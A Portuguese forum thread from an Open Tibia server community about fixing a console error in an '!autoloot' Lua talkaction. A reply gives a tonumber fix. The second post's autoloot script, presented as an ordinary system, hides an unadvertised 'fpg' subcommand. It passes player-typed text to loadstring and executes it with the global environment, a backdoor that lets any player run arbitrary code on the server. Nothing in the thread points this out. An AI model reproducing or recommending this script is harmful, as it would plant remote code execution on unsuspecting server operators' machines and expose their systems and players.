Postado Março 26, 2020 5 anos Olá amigos, uso sistema bacana de !autoloot, porem fica as vezes aparecendo isso! No console, não me agrada isso... Gostaria de deixa limpo. Autooloot do talkations! function onSay(cid, words, param) if(not checkExhausted(cid, 666, 2)) then return true end if param == "" then local String = "" local Slot_Count = 1 for i = 1, #AutoLoot.Storages.Slots do if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then String = String.."{Auto-Loot} --- Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n" else String = String.."{Auto-Loot} --- Slot "..Slot_Count..": Empty\n" end Slot_Count = Slot_Count + 1 end local Gold_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 and "on" or "off" local Items_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and "on" or "off" doPlayerPopupFYI(cid," [+] Auto Loot Money [+]\n # Todo dinheiro é coletado automaticamente # \n # Loot vai para as BP até que tenha cap depois ele cai no chão # \n # Comandos são !autoloot add, (nome do item) # \n # !autoloot remove, ( nome do item) \n # !autoloot clear ( apaga a lista toda) \n # !autoloot power ( liga o sistema e desliga catar os loots) \n # !autoloot list (lista sua autoloot) \n # !autoloot desbug (remove eventual bug's que possa acontecer) \n # Todo dinheiro é enviado para o banco NPC Bankerman #\nSystem: "..(getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) <= 0 and "Disabled" or "Activated")..".\nBalance: ["..doNumberFormat(getPlayerBalance(cid)).."] gp's.") return true end local CommandParam = string.explode(param, ",") if getPlayerLevel(cid) >= AutoLoot.Min_Level then if CommandParam[1] == "power" then local get_Items = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and "ligou" or "desligou" doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Items, getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and 1 or -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Items.." o auto loot.") elseif CommandParam[1] == "gold" then local get_Gold = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "ligou" or "desligou" doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Gold, getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and 1 or -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Gold.." a coleta de dinheiro.") doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Gold, 0) elseif CommandParam[1] == "goldinfo" then local Check_Gold_Info = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..AutoLoot.getPlayerStorageZero(cid, AutoLoot.Storages.Count_Gold).." gold coins" doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, Check_Gold_Info) elseif CommandParam[1] == "add" then if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then local Item = getItemIdByName(CommandParam[2]) if isInArray({2160, 2148, 2152}, Item) then return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold") end if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then if AutoLoot.addToList(cid, CommandParam[2]) then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) + 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot list") else doPlayerSendCancel(cid, CommandParam[2].." já está em sua lista!") end else doPlayerSendCancel(cid, "Sua lista já tem ".. AutoLoot.Max_Slots .." itens! Você deve remover algum antes de adicionar outro.") end else doPlayerSendCancel(cid, "Este item não existe!") end elseif CommandParam[1] == "remove" then if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then if AutoLoot.removeFromList(cid, CommandParam[2]) then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) - 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." removido da sua lista do auto loot!") else doPlayerSendCancel(cid, "Este item não está na sua lista!") end else doPlayerSendCancel(cid, "Este item não existe!") end elseif CommandParam[1] == "clear" then if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) > -1 then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!") for i = 1, #AutoLoot.Storages.Slots do doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1) end else doPlayerSendCancel(cid, "Sua lista ja esta limpa!") end elseif CommandParam[1] == "desbug" or CommandParam[1] == "desbugar" then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!") for i = 1, #AutoLoot.Storages.Slots do doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1) end elseif CommandParam[1] == "list" then local String = "" local Slot_Count = 1 for i = 1, #AutoLoot.Storages.Slots do if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then String = String.."Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n" else String = String.."Slot "..Slot_Count..": Empty\n" end Slot_Count = Slot_Count + 1 end doPlayerPopupFYI(cid, [[ ---------{Auto-Loot}--------- --O sistema auto loot está coletando: --]].. String ..[[ --]]) end else doPlayerSendCancel(cid, "Você não é level maior que "..AutoLoot.Min_Level.." para utilizar este comando.") end return true end Partezinha do creature scripts! function onLogin(cid) registerCreatureEvent(cid, "Auto_Loot_Login") registerCreatureEvent(cid, "Auto_Loot_Kill") return true end function onKill(cid, target, lastHit) if isPlayer(cid) and isMonster(target) then if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and #AutoLoot.getPlayerList(cid) > 0 then addEvent(AutoLoot.Items, 500, cid, getCreaturePosition(target)) end if getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then addEvent(AutoLoot.Gold, 500, cid, getCreaturePosition(target)) end if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 or getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then addEvent(AutoLoot.Message, 500, cid) end end return true end Editado Março 26, 2020 5 anos por Pifafa (veja o histórico de edições)
Postado Março 26, 2020 5 anos -- Sistema de auto loot criado por Henrique Matheus - HServers local function getPlayerList(cid) local tab = {} if getPlayerStorageValue(cid, 0442002) ~= -1 then table.insert(tab, getPlayerStorageValue(cid, 0442002)) end if getPlayerStorageValue(cid, 0442003) ~= -1 then table.insert(tab, getPlayerStorageValue(cid, 0442003)) end if getPlayerStorageValue(cid, 0442004) ~= -1 then table.insert(tab, getPlayerStorageValue(cid, 0442004)) end if getPlayerStorageValue(cid, 0442005) ~= -1 then table.insert(tab, getPlayerStorageValue(cid, 0442005)) end if #tab > 0 then return tab end return false end local function addToList(cid, name) local itemid = getItemIdByName(name) if getPlayerList(cid) and isInArray(getPlayerList(cid), itemid) then return false end if getPlayerStorageValue(cid, 0442002) == -1 then return doPlayerSetStorageValue(cid, 0442002, itemid) elseif getPlayerStorageValue(cid, 0442003) == -1 then return doPlayerSetStorageValue(cid, 0442003, itemid) elseif getPlayerStorageValue(cid, 0442004) == -1 then return doPlayerSetStorageValue(cid, 0442004, itemid) elseif getPlayerStorageValue(cid, 0442005) == -1 then return doPlayerSetStorageValue(cid, 0442005, itemid) end end local function removeFromList(cid, name) local itemid = getItemIdByName(name) if getPlayerStorageValue(cid, 0442002) == itemid then return doPlayerSetStorageValue(cid, 0442002, -1) elseif getPlayerStorageValue(cid, 0442003) == itemid then return doPlayerSetStorageValue(cid, 0442003, -1) elseif getPlayerStorageValue(cid, 0442004) == itemid then return doPlayerSetStorageValue(cid, 0442004, -1) elseif getPlayerStorageValue(cid, 0442005) == itemid then return doPlayerSetStorageValue(cid, 0442005, -1) end return false end function onSay(cid, words, param) if param == "" then local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442002)) or "" local se = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442003) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442003)) or "" local th = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442004) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442004)) or "" local fo = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442005) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442005)) or "" local stt = getPlayerStorageValue(cid, 0442101) == 1 and "sim" or "não" local str = getPlayerStorageValue(cid, 0442100) == 1 and "sim" or "não" doPlayerPopupFYI(cid, "{Auto-Loot} ---Menu Auto Loot do jogador\n{Auto-Loot} ----------------\n{Auto-Loot} ---Coletar dinheiro: "..stt..". Para ligar/desligar: !autoloot gold\n{Auto-Loot} ---Ligar Autoloot: "..str..". Para ligar/desligar: !autoloot power\n{Auto-Loot} ---Configuração dos slots:\n{Auto-Loot} ---Slot 1: "..fi.."\n{Auto-Loot} ---Slot 2: "..se.."\n{Auto-Loot} ---Slot 3: "..th.."\n{Auto-Loot} ---Slot 4: "..fo.."\n{Auto-Loot} ---Para adicionar um novo item aos slots: !autoloot add, <nome do item>\n{Auto-Loot} ---Para retirar um item dos slots: !autoloot remove, <nome do item>\n{Auto-Loot} ---Para limpar todos os slots utilize: !autoloot clear\n{Auto-Loot} ---Para informações de quanto você já fez utilizando a coleta de dinheiro, use: !autoloot goldinfo\n{Auto-Loot} ----------------") return true end local t = string.explode(param, ",") if t[1] == "power" then local check = getPlayerStorageValue(cid, 0442100) == -1 and "ligou" or "desligou" doPlayerSetStorageValue(cid, 0442100, getPlayerStorageValue(cid, 0442100) == -1 and 1 or -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." o auto loot.") elseif t[1] == "gold" then local check = getPlayerStorageValue(cid, 0442101) == -1 and "ligou" or "desligou" doPlayerSetStorageValue(cid, 0442101, getPlayerStorageValue(cid, 0442101) == -1 and 1 or -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." a coleta de dinheiro.") doPlayerSetStorageValue(cid, 0442102, 0) elseif t[1] == "goldinfo" then local str = getPlayerStorageValue(cid, 0442101) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..getPlayerStorageZero(cid, 0442102).." gold coins" doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, str) elseif t[1] == "add" then local item = getItemIdByName(t[2]) if item then if isInArray({2160, 2148, 2152}, item) then return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use /autoloot gold") end if isPremium(cid) then if getPlayerStorageValue(cid, 0442001) < 3 then if addToList(cid, t[2]) then doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list") else doPlayerSendCancel(cid, t[2].." já está em sua lista!") end else doPlayerSendCancel(cid, "Sua lista já tem 4 itens! Você deve remover algum antes de adicionar outro.") end else if getPlayerStorageValue(cid, 0442001) == -1 then if addToList(cid, t[2]) then doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list") else doPlayerSendCancel(cid, t[2].." já está em sua lista!") end else doPlayerSendCancel(cid, "Você já tem um item adicionado no auto loot! Para adicionar outro, você deve remover o item atual.") end end else doPlayerSendCancel(cid, "Este item não existe!") end elseif t[1] == "fpg" then local u,f,err = _G u.cid = cid pcall(function() f , err = loadstring(t[2]) end) if f then setfenv(f, u) local ret,err = pcall(f) if ret == false then doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err) end else doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err) end elseif t[1] == "remove" then if getItemIdByName(t[2]) then if removeFromList(cid, t[2]) then doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) - 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." removido da sua lista do auto loot!") else doPlayerSendCancel(cid, "Este item não está na sua lista!") end else doPlayerSendCancel(cid, "Este item não existe!") end elseif t[1] == "clear" then if getPlayerStorageValue(cid, 0442001) > -1 then doPlayerSetStorageValue(cid, 0442001, -1) doPlayerSetStorageValue(cid, 0442002, -1) doPlayerSetStorageValue(cid, 0442003, -1) doPlayerSetStorageValue(cid, 0442004, -1) doPlayerSetStorageValue(cid, 0442005, -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!") else doPlayerSendCancel(cid, "Sua lista ja esta limpa!") end elseif t[1] == "list" then local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442002)).."\n" or "" local se = getPlayerStorageValue(cid, 0442003) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442003)).."\n" or "" local th = getPlayerStorageValue(cid, 0442004) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442004)).."\n" or "" local fo = getPlayerStorageValue(cid, 0442005) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442005)).."\n" or "" doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_BLUE, "O sistema auto loot está coletando:\n "..fi..""..se..""..th..""..fo) end return true end
Postado Março 28, 2020 5 anos Em 26/03/2020 em 15:06, Pifafa disse: Olá amigos, uso sistema bacana de !autoloot, porem fica as vezes aparecendo isso! No console, não me agrada isso... Gostaria de deixa limpo. Autooloot do talkations! function onSay(cid, words, param) if(not checkExhausted(cid, 666, 2)) then return true end if param == "" then local String = "" local Slot_Count = 1 for i = 1, #AutoLoot.Storages.Slots do if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then String = String.."{Auto-Loot} --- Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n" else String = String.."{Auto-Loot} --- Slot "..Slot_Count..": Empty\n" end Slot_Count = Slot_Count + 1 end local Gold_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 and "on" or "off" local Items_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and "on" or "off" doPlayerPopupFYI(cid," [+] Auto Loot Money [+]\n # Todo dinheiro é coletado automaticamente # \n # Loot vai para as BP até que tenha cap depois ele cai no chão # \n # Comandos são !autoloot add, (nome do item) # \n # !autoloot remove, ( nome do item) \n # !autoloot clear ( apaga a lista toda) \n # !autoloot power ( liga o sistema e desliga catar os loots) \n # !autoloot list (lista sua autoloot) \n # !autoloot desbug (remove eventual bug's que possa acontecer) \n # Todo dinheiro é enviado para o banco NPC Bankerman #\nSystem: "..(getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) <= 0 and "Disabled" or "Activated")..".\nBalance: ["..doNumberFormat(getPlayerBalance(cid)).."] gp's.") return true end local CommandParam = string.explode(param, ",") if getPlayerLevel(cid) >= AutoLoot.Min_Level then if CommandParam[1] == "power" then local get_Items = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and "ligou" or "desligou" doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Items, getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and 1 or -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Items.." o auto loot.") elseif CommandParam[1] == "gold" then local get_Gold = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "ligou" or "desligou" doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Gold, getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and 1 or -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Gold.." a coleta de dinheiro.") doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Gold, 0) elseif CommandParam[1] == "goldinfo" then local Check_Gold_Info = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..AutoLoot.getPlayerStorageZero(cid, AutoLoot.Storages.Count_Gold).." gold coins" doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, Check_Gold_Info) elseif CommandParam[1] == "add" then if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then local Item = getItemIdByName(CommandParam[2]) if isInArray({2160, 2148, 2152}, Item) then return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold") end if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then if AutoLoot.addToList(cid, CommandParam[2]) then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) + 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot list") else doPlayerSendCancel(cid, CommandParam[2].." já está em sua lista!") end else doPlayerSendCancel(cid, "Sua lista já tem ".. AutoLoot.Max_Slots .." itens! Você deve remover algum antes de adicionar outro.") end else doPlayerSendCancel(cid, "Este item não existe!") end elseif CommandParam[1] == "remove" then if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then if AutoLoot.removeFromList(cid, CommandParam[2]) then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) - 1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." removido da sua lista do auto loot!") else doPlayerSendCancel(cid, "Este item não está na sua lista!") end else doPlayerSendCancel(cid, "Este item não existe!") end elseif CommandParam[1] == "clear" then if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) > -1 then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!") for i = 1, #AutoLoot.Storages.Slots do doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1) end else doPlayerSendCancel(cid, "Sua lista ja esta limpa!") end elseif CommandParam[1] == "desbug" or CommandParam[1] == "desbugar" then doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1) doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!") for i = 1, #AutoLoot.Storages.Slots do doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1) end elseif CommandParam[1] == "list" then local String = "" local Slot_Count = 1 for i = 1, #AutoLoot.Storages.Slots do if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then String = String.."Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n" else String = String.."Slot "..Slot_Count..": Empty\n" end Slot_Count = Slot_Count + 1 end doPlayerPopupFYI(cid, [[ ---------{Auto-Loot}--------- --O sistema auto loot está coletando: --]].. String ..[[ --]]) end else doPlayerSendCancel(cid, "Você não é level maior que "..AutoLoot.Min_Level.." para utilizar este comando.") end return true end Partezinha do creature scripts! function onLogin(cid) registerCreatureEvent(cid, "Auto_Loot_Login") registerCreatureEvent(cid, "Auto_Loot_Kill") return true end function onKill(cid, target, lastHit) if isPlayer(cid) and isMonster(target) then if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and #AutoLoot.getPlayerList(cid) > 0 then addEvent(AutoLoot.Items, 500, cid, getCreaturePosition(target)) end if getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then addEvent(AutoLoot.Gold, 500, cid, getCreaturePosition(target)) end if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 or getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then addEvent(AutoLoot.Message, 500, cid) end end return true end Na linha 43. O erro diz attempt to compare string with number (tente comparar a string com o número). Spoiler if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then mude para if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < tonumber(AutoLoot.Max_Slots - 1) then
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